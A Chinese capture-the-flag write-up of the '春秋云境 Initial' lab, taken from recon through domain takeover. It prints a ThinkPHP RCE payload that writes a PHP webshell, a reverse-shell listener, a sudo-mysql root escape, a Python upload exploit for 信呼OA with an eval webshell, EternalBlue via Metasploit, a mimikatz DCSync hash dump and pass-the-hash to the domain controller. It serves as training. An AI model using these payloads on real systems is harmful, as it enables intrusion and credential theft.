打靶记录(五二)之春秋云境Inital

端口初扫描

sudo nmap --min-rate 10000 -p- 39.98.115.107   
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:11 UTC
Nmap scan report for 39.98.115.107
Host is up (0.25s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

sudo nmap -sT -sV -sC -O -p22,80 39.98.115.107 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:12 UTC
Nmap scan report for 39.98.115.107
Host is up (0.033s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 21:f6:d5:f4:13:b9:8a:07:fe:b5:c5:f9:dc:8c:7b:b2 (RSA)
|   256 6c:7c:ae:fa:2e:68:1c:c3:59:bd:71:36:08:1f:db:55 (ECDSA)
|_  256 e5:1c:0a:61:98:db:95:e4:c6:39:cf:f2:84:03:4e:8f (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bootstrap Material Admin
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (97%), Actiontec MI424WR-GEN3I WAP (96%), VMware Player virtual NAT device (96%), Microsoft Windows XP SP3 (95%), Linux 3.2 (93%), Linux 4.4 (93%), BlueArc Titan 2100 NAS device (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.79 seconds

sudo nmap --script=vuln -p22,80 39.98.115.107  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 03:12 UTC
Nmap scan report for 39.98.115.107
Host is up (0.012s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://39.98.115.107:80/static/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://39.98.115.107:80/static/?C=D%3BO%3DD%27%20OR%20sqlspider
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=39.98.115.107
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://39.98.115.107:80/
|     Form id: loginfrom
|_    Form action: login.html
| http-enum: 
|_  /robots.txt: Robots file
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 56.26 seconds

外网Getshell

访问80端口是一个登陆界面，随便输了一点提示404？？目录扫描的结果也没有什么用处

根据ico可以判断是thinkphp，不过用fscan扫描的话也能得到吧

利用一下exp

先GET传参?s=captcha

然后POST传参：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/PgoK | base64 -d > shell.php

RNM校园网，直接蚁剑连不上shell半天，浪费我快3个沙砾，杀杀杀，换成流量就连上了。

提权

做个反弹shell吧，上传个reverseshell.php,用公网VPS开启一个监听:

rlwrap -cAr nc -lvnp 443 

一开始监听的是1234端口，发现连不上，估计是有安全组过滤之类的，换成443（HTTPS默认端口）就行了

浏览器中访问接收到shell

sudo -l 发现有执行MySQL的root权限

sudo mysql -e '\! /bin/bash'

flag01: flag{60b53231-

横向移动

https://github.com/shadow1ng/fscan/releases/tag/1.8.2

通过蚁剑上传一个fscan

查看result.txt

172.22.1.15:80 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:22 open
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
172.22.1.2:139 open
172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.15:22 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

现在已经拿到了.15的shell，看看.18的，开启了一个80端口，但是因为在内网，不能直接访问，做个内网穿透

利用neoreg，先在kali本地生成后门，密码为pass

python neoreg.py generate -k pass

用蚁剑上传tunnel.php到靶机的web目录

kali:

python neoreg.py -k pass -u http://39.99.227.141/tunnel.php

开启了一个本地的1080socks5代理服务器

更改proxychains4文件下方的代理

proxychains firefox

利用代理打开firefox

访问：

http://172.22.1.18/?m=login

弱口令admin/admin123登进

利用exp

exp.py

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

再在同目录写一个1.php

<?php eval($_POST["1"]);?>

proxychains python shell.py

得到：

Notice</b>:  Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2023-10\15_22002079.php

说明木马上传成功了

蚁剑开启代理服务器，代理本地的sock5服务器

获得shell

而且发现我们已经是system身份了

在admin目录下找到第二个flag

flag02: 2ce3-4813-87d4-

在之前的fscan扫描结果中看到：

172.22.1.21 MS17-010

很经典的永恒之蓝

直接利用msf,因为我们kali没有公网IP，不能反向shell，所以用正向shell

proxychains msfconsole -q

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/bind_tcp_uuid

set RHOSTS 172.22.1.21

run

跑了一会儿后直接拿到shell，而且我们是system用户了

域渗透

房间里有个DCSync的标签，没有学过。看了一下好像是可以模拟域控的行为？是mimikatz的一个功能

load kiwi

creds_all

得到当前：

Username        Domain    NTLM                              SHA1

XIAORANG-WIN7$  XIAORANG  e894362a92972b35de2a54fde7af42e7  c12040a34d763f6debaace6908fa653b60884865

kiwi_cmd lsadump::dcsync /all /csv

dump所有用户hash，我们只需要DCadmin的哈希

500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512

proxychains wmiexec.py xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

用wmiexec传递哈希，得到DC的shell

在admin目录找到flag3

flag03: e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

碎碎念

尝试开始打春秋云境，也是第一次打这种大型的域渗透啊，国内的靶场说实话真的不太习惯。但是还是学到了横向和内网穿透的一些姿势，总是还是挺难的吧，主要是烧钱（

但是听一个师傅说春秋的靶场好像不太行，估计也不会打很多吧